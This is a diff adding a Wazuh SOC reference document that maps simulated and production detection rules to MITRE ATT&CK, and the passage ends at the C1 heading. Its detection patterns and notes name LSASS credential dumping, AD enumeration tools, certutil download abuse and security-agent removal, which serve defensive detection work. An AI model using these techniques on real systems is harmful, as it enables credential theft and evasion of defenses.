codex wazuh sim log

docs/wazuh-decoders-rules.md

@@ -0,0 +1,583 @@
+# Wazuh Decoders & Rules — SOC MVP Reference
+
+## Overview
+
+All SOC simulation events carry the marker `soc_mvp_test=true` in the log body, which anchors the entire detection chain. Rules are split into two profiles per use case:
+
+- **Simulation profile** (`100xxx`): match `usecase_id=<ID>` — fired by the simulator script
+- **Production profile** (`110xxx`): match decoded field values from real log sources
+
+Severity levels: High → 12, Medium → 8, Low → 5
+
+---
+
+## MITRE ATT&CK Framework
+
+### What is MITRE ATT&CK?
+
+[MITRE ATT&CK](https://attack.mitre.org/) (Adversarial Tactics, Techniques, and Common Knowledge) is a globally recognised knowledge base that catalogues real-world adversary behaviour. It organises attacks into:
+
+- **Tactics** — the *why* (the adversary's goal at each stage, e.g. Initial Access, Persistence, Exfiltration)
+- **Techniques** — the *how* (the specific method used to achieve that goal, e.g. T1110 Brute Force)
+- **Sub-techniques** — a more precise variant of a technique (e.g. T1110.003 Password Spraying)
+
+Every Wazuh rule in this project tags the alert with one or more technique IDs so that alerts can be mapped onto the ATT&CK kill chain, fed into threat-intelligence platforms (e.g. TheHive, Splunk ES), and used to measure detection coverage.
+
+### Tactics Covered by This Ruleset
+
+| Tactic               | ATT&CK ID | What it means                                                        | Detected by                     |
+| -------------------- | --------- | -------------------------------------------------------------------- | ------------------------------- |
+| Reconnaissance       | TA0043    | Adversary gathers info before attacking — port scans, AD enumeration | A2-07/09, A4-03/05, C3-04       |
+| Initial Access       | TA0001    | First foothold into the network — exploiting web apps                | B3-02                           |
+| Execution            | TA0002    | Running malicious code on a system                                   | B3-02, B3-06                    |
+| Persistence          | TA0003    | Maintaining access after reboots or credential changes               | A4-13, B3-03                    |
+| Privilege Escalation | TA0004    | Gaining higher-level permissions                                     | A4-07/11/12, C2-04              |
+| Defense Evasion      | TA0005    | Avoiding detection — disabling security tools or logging             | A2-04, B2-01, B3-04             |
+| Credential Access    | TA0006    | Stealing credentials from systems or services                        | A3-03/04, A4-01/02/04, B3-01/05 |
+| Discovery            | TA0007    | Learning about internal environment after access                     | A4-03/05, C3-04                 |
+| Lateral Movement     | TA0008    | Moving through the network after initial compromise                  | A4-08, C3-01/02/03              |
+| Collection           | TA0009    | Gathering data of interest — config files, sensitive docs            | A2-05                           |
+| Command and Control  | TA0011    | Adversary communicating with compromised systems                     | A1-01/02, A2-08/10, B3-06       |
+| Impact               | TA0040    | Disrupting availability or integrity — log suppression               | B2-01                           |
+
+### Technique Reference
+
+All technique IDs used in this ruleset, with name, tactic, and which use cases apply:
+
+| Technique ID | Name                              | Tactic                                                                | Used In                                      |
+| ------------ | --------------------------------- | --------------------------------------------------------------------- | -------------------------------------------- |
+| T1005        | Data from Local System            | Collection                                                            | A2-05                                        |
+| T1021        | Remote Services                   | Lateral Movement                                                      | C3-01                                        |
+| T1021.001    | Remote Desktop Protocol           | Lateral Movement                                                      | A2-01, C3-03                                 |
+| T1021.002    | SMB/Windows Admin Shares          | Lateral Movement                                                      | C3-02                                        |
+| T1021.004    | SSH                               | Lateral Movement                                                      | B1-02/03                                     |
+| T1046        | Network Service Discovery         | Discovery / Reconnaissance                                            | A2-07/09, C3-04                              |
+| T1071        | Application Layer Protocol        | Command and Control                                                   | A2-08/10                                     |
+| T1071.004    | DNS                               | Command and Control                                                   | A1-01                                        |
+| T1078        | Valid Accounts                    | Defense Evasion / Initial Access / Persistence / Privilege Escalation | A3-01/02/05, A4-06/09/20/22/24, C1-01, C2-02 |
+| T1078.002    | Domain Accounts                   | Privilege Escalation                                                  | C2-01                                        |
+| T1078.003    | Local Accounts                    | Privilege Escalation                                                  | A4-10, C2-03                                 |
+| T1087.002    | Domain Account (Discovery)        | Discovery                                                             | A4-03                                        |
+| T1098        | Account Manipulation              | Persistence / Privilege Escalation                                    | A2-02/03, A4-11/12/13, C2-04                 |
+| T1103        | —                                 | —                                                                     | —                                            |
+| T1105        | Ingress Tool Transfer             | Command and Control                                                   | B3-06                                        |
+| T1110        | Brute Force                       | Credential Access                                                     | A3-03/04, A4-01/02/04/14/16/17/18, B1-01/03  |
+| T1110.003    | Password Spraying                 | Credential Access                                                     | A4-15/19                                     |
+| T1134        | Access Token Manipulation         | Defense Evasion / Privilege Escalation                                | A4-07                                        |
+| T1135        | Network Share Discovery           | Discovery                                                             | A4-05                                        |
+| T1136        | Create Account                    | Persistence                                                           | A2-03, A4-21/23                              |
+| T1136.001    | Local Account                     | Persistence                                                           | A4-23                                        |
+| T1136.002    | Domain Account                    | Persistence                                                           | A4-21                                        |
+| T1190        | Exploit Public-Facing Application | Initial Access                                                        | B3-02                                        |
+| T1505.003    | Web Shell                         | Persistence                                                           | B3-03                                        |
+| T1550.002    | Pass the Hash                     | Defense Evasion / Lateral Movement                                    | A4-08                                        |
+| T1562        | Impair Defenses                   | Defense Evasion                                                       | A2-04                                        |
+| T1562.001    | Disable or Modify Tools           | Defense Evasion                                                       | B3-04                                        |
+| T1562.006    | Indicator Blocking                | Defense Evasion                                                       | B2-01                                        |
+| T1568        | Dynamic Resolution                | Command and Control                                                   | A1-02                                        |
+| T1595        | Active Scanning                   | Reconnaissance                                                        | A2-06                                        |
+
+### ATT&CK Coverage Heatmap (by Tactic)
+
+```
+Reconnaissance      ██░░░░  A2-07/09, A4-03/05, C3-04
+Initial Access      ██░░░░  B3-02 (web exploit)
+Execution           █░░░░░  B3-02/06
+Persistence         ████░░  A2-03, A4-13/21/23, B3-03
+Privilege Escalation████░░  A4-07/11/12, C2-01/04
+Defense Evasion     ████░░  A2-04, A4-07/08, B2-01, B3-04
+Credential Access   ██████  A3, A4-01/02/04/14-19, B3-01/05
+Discovery           ███░░░  A4-03/05, C3-04
+Lateral Movement    ████░░  A4-08, C3-01/02/03
+Collection          █░░░░░  A2-05
+Command & Control   ████░░  A1, A2-08/10, B3-06
+```
+
+---
+
+## Decoder Chain
+
+File: `config/wazuh_cluster/local_decoder.xml`
+
+### How it works
+
+```
+Raw log
+  └─ soc-mvp-base          prematch: soc_mvp_test=true
+       ├─ soc-mvp-dns               source=dns
+       ├─ soc-mvp-fgt-traffic       source=fortigate + type="traffic"
+       ├─ soc-mvp-fgt-event         source=fortigate + type="event"
+       ├─ soc-mvp-fgt-utm           source=fortigate + type="utm"
+       ├─ soc-mvp-fgt-vpn           source=fortigate + subtype="vpn"
+       ├─ soc-mvp-windows           source=windows
+       ├─ soc-mvp-windows-lateral   source=windows + dstip=  (overrides above)
+       ├─ soc-mvp-vpn               source=vpn
+       ├─ soc-mvp-vmware            source=vmware  (with src_ip)
+       ├─ soc-mvp-vmware-nosrcip    source=vmware  (no src_ip)
+       ├─ soc-mvp-logmon            source=log_monitor
+       ├─ soc-mvp-sysmon            source=windows_sysmon
+       └─ soc-mvp-sysmon-exec       source=windows_sysmon + cmdline=
+```
+
+> **Note:** Simulator A2/A3 events include `date=/logid=` headers that trigger the built-in `fortigate-firewall-v6` decoder instead of `soc-mvp-base`. Bridge rule **100205** re-anchors those events into the SOC chain.
+
+### Decoder Details
+
+| Decoder                   | Parent | Prematch                              | Fields Extracted                                                  |
+| ------------------------- | ------ | ------------------------------------- | ----------------------------------------------------------------- |
+| `soc-mvp-base`            | —      | `soc_mvp_test=true`                   | —                                                                 |
+| `soc-mvp-dns`             | base   | `source=dns`                          | `status` (event_type), `srcip`                                    |
+| `soc-mvp-fgt-traffic`     | base   | `source=fortigate` + `type="traffic"` | `srcip`, `action`                                                 |
+| `soc-mvp-fgt-event`       | base   | `source=fortigate` + `type="event"`   | `action`, `srcuser`                                               |
+| `soc-mvp-fgt-utm`         | base   | `source=fortigate` + `type="utm"`     | `status` (subtype), `srcip`                                       |
+| `soc-mvp-fgt-vpn`         | base   | `source=fortigate` + `subtype="vpn"`  | `action`, `srcuser`, `srcip`                                      |
+| `soc-mvp-windows`         | base   | `source=windows`                      | `id` (event_id), `srcuser`, `srcip`                               |
+| `soc-mvp-windows-lateral` | base   | `source=windows` + `dstip=`           | `id`, `srcuser`, `srcip`, `dstip`                                 |
+| `soc-mvp-vpn`             | base   | `source=vpn`                          | `status` (event_type), `srcuser`, `srcip`, `extra_data` (country) |
+| `soc-mvp-vmware`          | base   | `source=vmware`                       | `status` (event_type), `srcuser`, `srcip`                         |
+| `soc-mvp-vmware-nosrcip`  | base   | `source=vmware`                       | `status` (event_type), `srcuser`                                  |
+| `soc-mvp-logmon`          | base   | `source=log_monitor`                  | `status` (event_type)                                             |
+| `soc-mvp-sysmon`          | base   | `source=windows_sysmon`               | `status` (event_type), `id` (event_id), `url` (process)           |
+| `soc-mvp-sysmon-exec`     | base   | `source=windows_sysmon` + `cmdline=`  | `status`, `id`, `url`                                             |
+
+---
+
+## Base Rules
+
+File: `config/wazuh_cluster/local_rules.xml`
+
+| Rule ID | Level | Description                                      | Trigger                                               |
+| ------- | ----- | ------------------------------------------------ | ----------------------------------------------------- |
+| 100200  | 3     | SOC MVP: synthetic test event detected           | `soc_mvp_test=true` in any event                      |
+| 100205  | 3     | SOC MVP: synthetic FortiGate test event (bridge) | Built-in `fortigate` group rule + `soc_mvp_test=true` |
+| 100210  | 3     | SOC MVP: Appendix A simulation event             | `if_sid=100200` + `section=A`                         |
+| 100220  | 3     | SOC MVP: Appendix B simulation event             | `if_sid=100200` + `section=B`                         |
+| 100230  | 3     | SOC MVP: Appendix C simulation event             | `if_sid=100200` + `section=C`                         |
+
+Rule **100205** exists to handle A2/A3 simulator events that are processed by the built-in FortiGate decoder. A2/A3 rules use `if_sid=100200, 100205` so they fire in both the direct (`soc-mvp-base`) and FortiGate-decoded paths.
+
+---
+
+## A1 — DNS / Firewall IOC
+
+File: `rules/soc-a1-ioc-rules.xml` | Decoder: `soc-mvp-dns` | Source: `source=dns`
+
+**ATT&CK context:** DNS-based IOC detection targets the **Command and Control** tactic. Adversaries use DNS to communicate with malware (C2 beaconing) or to redirect victims to malicious infrastructure via dynamic domain generation. Detecting these queries at the DNS layer is a high-fidelity signal because legitimate applications rarely query known-bad domains.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                        | MITRE ID  | Technique                       | Tactic              |
+| ------- | ----- | ----------------------------------------------- | --------- | ------------------------------- | ------------------- |
+| 100301  | 8     | A1-01: DNS traffic to malicious domain detected | T1071.004 | Application Layer Protocol: DNS | Command and Control |
+| 100302  | 8     | A1-02: DNS IOC domain match from threat feed    | T1568     | Dynamic Resolution              | Command and Control |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition               | Description                                           | MITRE ID  | Technique                       |
+| ------- | ----- | ----------------------------- | ----------------------------------------------------- | --------- | ------------------------------- |
+| 110301  | 8     | `event_type=ioc_dns_traffic`  | DNS query to malicious domain (IOC traffic indicator) | T1071.004 | Application Layer Protocol: DNS |
+| 110302  | 8     | `event_type=ioc_domain_match` | DNS IOC domain match from threat intelligence feed    | T1568     | Dynamic Resolution              |
+
+**T1071.004 — Application Layer Protocol: DNS**
+Adversaries use DNS queries to communicate with C2 infrastructure, hiding malicious traffic within normal DNS traffic that is often not inspected. Detects beaconing malware or data exfiltration tunnelled over DNS.
+
+**T1568 — Dynamic Resolution**
+Adversaries use dynamic DNS or algorithmically generated domain names (DGA) to make their C2 infrastructure harder to block. A domain appearing in a threat feed but not seen before in the environment is a strong indicator.
+
+---
+
+## A2 — FortiGate IPS/IDS & Firewall
+
+File: `rules/soc-a2-fortigate-fw-rules.xml` | Decoders: `soc-mvp-fgt-traffic`, `soc-mvp-fgt-event`, `soc-mvp-fgt-utm` | Source: `source=fortigate`
+
+Parent: `if_sid=100200, 100205` (both direct and FortiGate-decoded paths)
+
+**ATT&CK context:** Firewall logs capture both network-level threats (scanning, C2 traffic) and administrative abuse (config changes, account creation). This section spans **Reconnaissance**, **Persistence**, **Defense Evasion**, **Collection**, and **Command and Control** — covering the adversary's first steps to establish a foothold and maintain it.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                  | MITRE ID  | Technique                  | Tactic              |
+| ------- | ----- | --------------------------------------------------------- | --------- | -------------------------- | ------------------- |
+| 100311  | 12    | A2-01: Allowed RDP from public IP                         | T1021.001 | Remote Desktop Protocol    | Lateral Movement    |
+| 100312  | 12    | A2-02: Firewall admin password changed                    | T1098     | Account Manipulation       | Persistence         |
+| 100313  | 12    | A2-03: Firewall admin account created                     | T1136     | Create Account             | Persistence         |
+| 100314  | 12    | A2-04: Firewall email notification disabled               | T1562     | Impair Defenses            | Defense Evasion     |
+| 100315  | 5     | A2-05: Firewall configuration downloaded                  | T1005     | Data from Local System     | Collection          |
+| 100316  | 8     | A2-06: Multiple critical/high IDS alerts detected         | T1595     | Active Scanning            | Reconnaissance      |
+| 100317  | 5     | A2-07: Port scanning from public IP detected              | T1046     | Network Service Discovery  | Discovery           |
+| 100318  | 8     | A2-08: IOC-matched network traffic blocked by IPS         | T1071     | Application Layer Protocol | Command and Control |
+| 100319  | 8     | A2-09: Port scanning from internal private IP             | T1046     | Network Service Discovery  | Discovery           |
+| 100320  | 8     | A2-10: Communication to known malicious IP (C2 indicator) | T1071     | Application Layer Protocol | Command and Control |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition                                     | Description                                | MITRE ID  | Technique                  |
+| ------- | ----- | --------------------------------------------------- | ------------------------------------------ | --------- | -------------------------- |
+| 110311  | 12    | `dstport=3389` + `action="accept"`                  | RDP traffic allowed                        | T1021.001 | Remote Desktop Protocol    |
+| 110312  | 12    | `action="password-change"`                          | Admin account password changed             | T1098     | Account Manipulation       |
+| 110313  | 12    | `action="create-admin"`                             | New admin account created                  | T1136     | Create Account             |
+| 110314  | 12    | `action="config-change"` + `config_value=disable`   | Alerting/notification disabled             | T1562     | Impair Defenses            |
+| 110315  | 5     | `action="download-config"`                          | Firewall configuration file downloaded     | T1005     | Data from Local System     |
+| 110316  | 8     | `subtype="ips"` + `attack="Multiple.Critical`       | Multiple critical IPS signatures triggered | T1595     | Active Scanning            |
+| 110317  | 5     | `subtype="anomaly"` + `attack="TCP.Port.Scan"`      | TCP port scan from external IP             | T1046     | Network Service Discovery  |
+| 110318  | 8     | `subtype="ips"` + `ioc_type=ip`                     | IOC-based IP indicator detected            | T1071     | Application Layer Protocol |
+| 110319  | 8     | `subtype="anomaly"` + `attack="Internal.Port.Scan"` | Internal port scan from private source     | T1046     | Network Service Discovery  |
+| 110320  | 8     | `threat_label="known-c2"`                           | Traffic to known C2/malicious IP           | T1071     | Application Layer Protocol |
+
+**T1021.001 — Remote Desktop Protocol**
+RDP exposed to public IPs is a prime attack vector for ransomware groups and APTs. An inbound `accept` to port 3389 from a non-private source is anomalous in most corporate environments.
+
+**T1098 — Account Manipulation**
+Changing admin credentials or creating backdoor admin accounts on a firewall gives an attacker persistent, privileged access to network infrastructure that is extremely hard to detect and revoke.
+
+**T1562 — Impair Defenses**
+Disabling email notifications on a firewall silences a critical alerting channel, allowing subsequent malicious activity to go unnoticed. This is a hallmark pre-attack step.
+
+**T1595 — Active Scanning**
+Multiple IPS signature hits in a short window is a strong indicator of automated scanning or exploit frameworks (e.g. Metasploit, Nmap NSE scripts) probing for vulnerabilities.
+
+---
+
+## A3 — FortiGate VPN
+
+File: `rules/soc-a3-fortigate-vpn-rules.xml` | Decoder: `soc-mvp-fgt-vpn` | Source: `source=fortigate subtype="vpn"`
+
+Parent: `if_sid=100200, 100205` (both direct and FortiGate-decoded paths)
+
+**ATT&CK context:** VPN is the primary remote access gateway for most organisations. Attackers target it with brute-force, credential stuffing, and stolen credentials. All A3 rules map to **Valid Accounts (T1078)** or **Brute Force (T1110)** — the two most common techniques for initial access via VPN.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                      | MITRE ID | Technique      | Tactic                           |
+| ------- | ----- | ------------------------------------------------------------- | -------- | -------------- | -------------------------------- |
+| 100331  | 12    | A3-01: VPN login success from guest account                   | T1078    | Valid Accounts | Initial Access / Defense Evasion |
+| 100332  | 12    | A3-02: VPN login success from multiple countries              | T1078    | Valid Accounts | Initial Access                   |
+| 100333  | 12    | A3-03: VPN brute-force success (many failures then success)   | T1110    | Brute Force    | Credential Access                |
+| 100334  | 5     | A3-04: VPN multiple auth failures (many accounts, one source) | T1110    | Brute Force    | Credential Access                |
+| 100335  | 12    | A3-05: VPN login success from outside Thailand                | T1078    | Valid Accounts | Initial Access                   |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition                                                  | Description                                        | MITRE ID | Technique      |
+| ------- | ----- | ---------------------------------------------------------------- | -------------------------------------------------- | -------- | -------------- |
+| 110331  | 12    | `action="ssl-login-success"` + `user="guest"`                    | VPN auth success by guest account                  | T1078    | Valid Accounts |
+| 110332  | 12    | `action="ssl-login-success"` + `previous_country=`               | VPN success from different country than last login | T1078    | Valid Accounts |
+| 110333  | 12    | `action="ssl-login-success"` + `failed_attempts_before_success=` | VPN success after multiple prior failures          | T1110    | Brute Force    |
+| 110334  | 5     | `action="ssl-login-fail"` + `failed_accounts=`                   | Multiple account failures from single source IP    | T1110    | Brute Force    |
+| 110335  | 12    | `action="ssl-login-success"` + `expected_country=TH`             | VPN auth success from outside Thailand             | T1078    | Valid Accounts |
+
+**T1078 — Valid Accounts**
+Using legitimately provisioned credentials (stolen, purchased, or guessed) to log in. A guest account or a login from an unexpected country strongly suggests compromised credentials rather than a legitimate user.
+
+**T1110 — Brute Force**
+Systematically trying many passwords against an account. A pattern of many failures followed by a success is a reliable brute-force indicator. Multiple accounts failing from one source indicates credential stuffing (using breached password lists).
+
+---
+
+## A4 — Windows / Active Directory
+
+File: `rules/soc-a4-windows-ad-rules.xml` | Decoder: `soc-mvp-windows` | Source: `source=windows`
+
+**ATT&CK context:** Windows event logs are the richest source of attacker activity on-premise. A4 covers the full attack lifecycle within AD — from external credential attacks (initial access) through privilege escalation and persistence via account manipulation. Windows Security Event IDs are the primary production match signal.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                       | MITRE ID  | Technique                                            | Tactic                             |
+| ------- | ----- | -------------------------------------------------------------- | --------- | ---------------------------------------------------- | ---------------------------------- |
+| 100341  | 8     | A4-01: Multiple auth failures from privileged account          | T1110     | Brute Force                                          | Credential Access                  |
+| 100342  | 8     | A4-02: Multiple auth failures from service account             | T1110     | Brute Force                                          | Credential Access                  |
+| 100343  | 8     | A4-03: AD enumeration via malicious tools (e.g. adfind)        | T1087.002 | Account Discovery: Domain Account                    | Discovery                          |
+| 100344  | 8     | A4-04: Auth failure from public IP                             | T1110     | Brute Force                                          | Credential Access                  |
+| 100345  | 8     | A4-05: File share enumeration to single destination            | T1135     | Network Share Discovery                              | Discovery                          |
+| 100346  | 12    | A4-06: Authentication success from public IP                   | T1078     | Valid Accounts                                       | Initial Access                     |
+| 100347  | 12    | A4-07: Privileged account impersonation                        | T1134     | Access Token Manipulation                            | Privilege Escalation               |
+| 100348  | 12    | A4-08: Pass-the-hash RDP authentication success                | T1550.002 | Use Alternate Authentication Material: Pass the Hash | Defense Evasion / Lateral Movement |
+| 100349  | 12    | A4-09: Authentication success from guest account               | T1078     | Valid Accounts                                       | Initial Access                     |
+| 100350  | 12    | A4-10: Service account interactive logon (logon_type=2)        | T1078.003 | Valid Accounts: Local Accounts                       | Privilege Escalation               |
+| 100351  | 12    | A4-11: Account added to custom privileged group                | T1098     | Account Manipulation                                 | Persistence                        |
+| 100352  | 12    | A4-12: Account added to Domain Admins or privileged group      | T1098     | Account Manipulation                                 | Persistence                        |
+| 100353  | 12    | A4-13: DSRM password reset on domain controller                | T1098     | Account Manipulation                                 | Persistence                        |
+| 100354  | 5     | A4-14: One account failing from many sources                   | T1110     | Brute Force                                          | Credential Access                  |
+| 100355  | 5     | A4-15: Many accounts failing from one source (spray indicator) | T1110.003 | Password Spraying                                    | Credential Access                  |
+| 100356  | 5     | A4-16: Guest account multiple auth failures                    | T1110     | Brute Force                                          | Credential Access                  |
+| 100357  | 5     | A4-17: One account failing from one source                     | T1110     | Brute Force                                          | Credential Access                  |
+| 100358  | 5     | A4-18: Multiple interactive logon denials                      | T1110     | Brute Force                                          | Credential Access                  |
+| 100359  | 5     | A4-19: Password spray pattern detected                         | T1110.003 | Password Spraying                                    | Credential Access                  |
+| 100360  | 5     | A4-20: Auth attempt from disabled account                      | T1078     | Valid Accounts                                       | Defense Evasion                    |
+| 100361  | 5     | A4-21: Domain account created                                  | T1136.002 | Create Account: Domain Account                       | Persistence                        |
+| 100362  | 5     | A4-22: Local account re-enabled                                | T1078     | Valid Accounts                                       | Persistence                        |
+| 100363  | 5     | A4-23: Local account created                                   | T1136.001 | Create Account: Local Account                        | Persistence                        |
+| 100364  | 5     | A4-24: Domain account re-enabled                               | T1078     | Valid Accounts                                       | Persistence                        |
+
+### Production Rules
+
+| Rule ID | Level | Event ID | Match Condition                              | Description                              | MITRE ID  | Technique                         |
+| ------- | ----- | -------- | -------------------------------------------- | ---------------------------------------- | --------- | --------------------------------- |
+| 110341  | 8     | 4625     | `is_admin=true`                              | Privileged account auth failures         | T1110     | Brute Force                       |
+| 110342  | 8     | 4625     | `is_service=true`                            | Service account auth failures            | T1110     | Brute Force                       |
+| 110343  | 8     | 4688     | `process=adfind.exe`                         | AD enumeration tool executed             | T1087.002 | Account Discovery: Domain Account |
+| 110346  | 12    | 4624     | `logon_type=10`                              | Remote interactive auth success          | T1078     | Valid Accounts                    |
+| 110348  | 12    | 4624     | `auth_package="NTLM"` + `pth_indicator=true` | Pass-the-hash via NTLM                   | T1550.002 | Pass the Hash                     |
+| 110349  | 12    | 4624     | `account="guest"`                            | Guest account auth success               | T1078     | Valid Accounts                    |
+| 110350  | 12    | 4624     | `logon_type=2` + `is_service=true`           | Service account interactive logon        | T1078.003 | Valid Accounts: Local Accounts    |
+| 110352  | 12    | 4728     | `target_group=`                              | Account added to privileged domain group | T1098     | Account Manipulation              |
+| 110353  | 12    | 4732     | `target_group=`                              | Account added to privileged local group  | T1098     | Account Manipulation              |
+| 110354  | 12    | 4794     | —                                            | DSRM account password set on DC          | T1098     | Account Manipulation              |
+| 110359  | 5     | 4625     | `spray=true`                                 | Password spray pattern indicator         | T1110.003 | Password Spraying                 |
+| 110361  | 5     | 4720     | —                                            | New user account created                 | T1136     | Create Account                    |
+| 110362  | 5     | 4722     | —                                            | User account re-enabled                  | T1078     | Valid Accounts                    |
+
+**T1087.002 — Account Discovery: Domain Account**
+Tools like AdFind, BloodHound, and ldapdomaindump query Active Directory to map users, groups, and trust relationships — essential for planning privilege escalation paths. Event ID 4688 (process creation) is used to catch the tool execution.
+
+**T1134 — Access Token Manipulation**
+An attacker with sufficient privilege duplicates or steals the access token of a more privileged process, effectively impersonating that account without needing its password.
+
+**T1550.002 — Pass the Hash**
+The NTLM hash of a password can be used directly for authentication without knowing the plaintext password. Detected by NTLM authentication with logon type 10 (Remote Interactive) from an anomalous source.
+
+**T1098 — Account Manipulation (DSRM — A4-13)**
+The Directory Services Restore Mode (DSRM) account is a local administrator on every Domain Controller. Resetting its password (event 4794) and enabling remote login to it gives an attacker a persistent, offline backdoor to the DC that survives domain-level password resets.
+
+**T1110.003 — Password Spraying**
+Rather than many attempts on one account (which triggers lockout), the attacker tries one or two common passwords across many accounts. Harder to detect per-account but visible as a low-and-slow horizontal pattern across Event ID 4625 failures.
+
+---
+
+## B1 — VMware vCenter / ESXi
+
+File: `rules/soc-b1-vmware-rules.xml` | Decoders: `soc-mvp-vmware`, `soc-mvp-vmware-nosrcip` | Source: `source=vmware`
+
+**ATT&CK context:** Hypervisor compromise is catastrophic — full control of all guest VMs, storage, and networking. B1 targets **Brute Force** against vCenter (the management plane) and **SSH enablement** on ESXi hosts, which is the most common first step attackers take after gaining vCenter admin access.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                        | MITRE ID  | Technique            | Tactic            |
+| ------- | ----- | --------------------------------------------------------------- | --------- | -------------------- | ----------------- |
+| 100401  | 12    | B1-01: vCenter login failures followed by success (brute-force) | T1110     | Brute Force          | Credential Access |
+| 100402  | 8     | B1-02: ESXi SSH service enabled on host                         | T1021.004 | Remote Services: SSH | Lateral Movement  |
+| 100403  | 12    | B1-03: ESXi SSH brute-force failures followed by success        | T1110     | Brute Force          | Credential Access |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition                                | Description                                         | MITRE ID  | Technique            |
+| ------- | ----- | ---------------------------------------------- | --------------------------------------------------- | --------- | -------------------- |
+| 110401  | 12    | `event_type=vmware_vcenter_login_fail_success` | vCenter login burst pattern (failures then success) | T1110     | Brute Force          |
+| 110402  | 8     | `event_type=vmware_esxi_enable_ssh`            | ESXi SSH service enabled                            | T1021.004 | Remote Services: SSH |
+| 110403  | 12    | `event_type=vmware_esxi_ssh_fail_success`      | ESXi SSH brute-force then success                   | T1110     | Brute Force          |
+
+**T1021.004 — Remote Services: SSH**
+ESXi does not run SSH by default. Enabling it provides direct shell access to the hypervisor, bypassing vCenter authentication entirely. Any unauthorised SSH enablement on an ESXi host should be treated as a critical incident.
+
+---
+
+## B2 — Log Monitoring
+
+File: `rules/soc-b2-logmon-rules.xml` | Decoder: `soc-mvp-logmon` | Source: `source=log_monitor`
+
+**ATT&CK context:** Log gaps are a **Defense Evasion** indicator. An attacker who has gained access to a log source (firewall, DC, EDR) may stop or tamper with its logging to remove evidence of their activity. Detecting that a previously active log stream has gone silent is an important meta-detection capability.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                    | MITRE ID  | Technique                           | Tactic          |
+| ------- | ----- | ------------------------------------------- | --------- | ----------------------------------- | --------------- |
+| 100411  | 5     | B2-01: Log loss detected on expected stream | T1562.006 | Impair Defenses: Indicator Blocking | Defense Evasion |
+
+### Production Rules
+
+| Rule ID | Level | Match Condition                 | Description                                     | MITRE ID  | Technique                           |
+| ------- | ----- | ------------------------------- | ----------------------------------------------- | --------- | ----------------------------------- |
+| 110411  | 5     | `event_type=log_loss_detection` | Log ingestion loss detected on monitored stream | T1562.006 | Impair Defenses: Indicator Blocking |
+
+**T1562.006 — Impair Defenses: Indicator Blocking**
+Adversaries may stop logging services, block log forwarding, or delete log files to prevent defenders from detecting their actions. A log loss alert does not confirm malicious intent (hardware/network failure can cause it too) but must always be investigated promptly.
+
+---
+
+## B3 — Windows Sysmon
+
+File: `rules/soc-b3-sysmon-rules.xml` | Decoders: `soc-mvp-sysmon`, `soc-mvp-sysmon-exec` | Source: `source=windows_sysmon`
+
+**ATT&CK context:** Sysmon provides deep process and file-level telemetry that Windows Security logs lack. B3 detects post-exploitation activity: credential dumping, web application compromise, and security tool removal — all high-confidence, late-stage attack indicators.
+
+### Simulation Rules
+
+| Rule ID | Level | Use Case                                                | MITRE ID  | Technique                                | Tactic              |
+| ------- | ----- | ------------------------------------------------------- | --------- | ---------------------------------------- | ------------------- |
+| 100421  | 12    | B3-01: LSASS memory dump via procdump (Sysmon event 10) | T1003.001 | OS Credential Dumping: LSASS Memory      | Credential Access   |
+| 100422  | 12    | B3-02: SQL injection attempt via web process (event 1)  | T1190     | Exploit Public-Facing Application        | Initial Access      |
+| 100423  | 12    | B3-03: Webshell file creation in web root (event 11)    | T1505.003 | Server Software Component: Web Shell     | Persistence         |
+| 100424  | 12    | B3-04: Security agent uninstalled via msiexec           | T1562.001 | Impair Defenses: Disable or Modify Tools | Defense Evasion     |
+| 100425  | 12    | B3-05: LSASS dump via Task Manager (event 10)           | T1003.001 | OS Credential Dumping: LSASS Memory      | Credential Access   |
+| 100426  | 8     | B3-06: Certutil used to download remote payload         | T1105     | Ingress Tool Transfer                    | Command and Control |
+
+### Production Rules
+
+| Rule ID | Level | Sysmon Event             | Match Condition                              | Description                              | MITRE ID  | Technique                                |
+| ------- | ----- | ------------------------ | -------------------------------------------- | ---------------------------------------- | --------- | ---------------------------------------- |
+| 110421  | 12    | Event 10 (ProcessAccess) | `target_process=lsass.exe`                   | LSASS process access                     | T1003.001 | OS Credential Dumping: LSASS Memory      |
+| 110422  | 12    | Event 1 (ProcessCreate)  | `event_type=sysmon_sql_injection`            | SQL injection pattern in web process     | T1190     | Exploit Public-Facing Application        |
+| 110423  | 12    | Event 11 (FileCreate)    | `event_type=sysmon_webshell`                 | File creation in web root by web process | T1505.003 | Server Software Component: Web Shell     |
+| 110424  | 12    | Event 1 (ProcessCreate)  | `event_type=sysmon_security_agent_uninstall` | Security agent removal via msiexec       | T1562.001 | Impair Defenses: Disable or Modify Tools |
+| 110425  | 12    | Event 10 (ProcessAccess) | `event_type=sysmon_lsass_dump_taskmgr`       | LSASS dump via Task Manager              | T1003.001 | OS Credential Dumping: LSASS Memory      |
+| 110426  | 8     | Event 1 (ProcessCreate)  | `process=certutil.exe` + `cmdline=`          | certutil.exe download pattern            | T1105     | Ingress Tool Transfer                    |
+
+**T1003.001 — OS Credential Dumping: LSASS Memory**
+The Windows LSASS (Local Security Authority Subsystem Service) process stores password hashes and Kerberos tickets in memory. Tools like Mimikatz, procdump, and Task Manager's "Create dump file" feature can extract these credentials for offline cracking or direct pass-the-hash use. Sysmon Event ID 10 (ProcessAccess with lsass.exe as the target) is the most reliable detection point.
+
+**T1505.003 — Server Software Component: Web Shell**
+After exploiting a web application, attackers drop a small script (PHP, ASPX, JSP) into the web root that accepts commands via HTTP requests. Sysmon Event ID 11 (FileCreate) in web-accessible directories by the web server process is a high-fidelity indicator.
+
+**T1562.001 — Impair Defenses: Disable or Modify Tools**
+Attackers remove or disable endpoint security agents (AV, EDR) to eliminate the primary detection mechanism before executing their final objective. `msiexec /x` targeting known security agent GUIDs is a common pattern.
+
+**T1105 — Ingress Tool Transfer**
+`certutil.exe` is a legitimate Windows binary for certificate management but is widely abused (`LOLBin`) to download files from the internet using its `-urlcache -split -f` options. This is a classic living-off-the-land technique because many environments allow it past security controls.
+
+---
+
+## C1 — Impossible Travel Detection
+
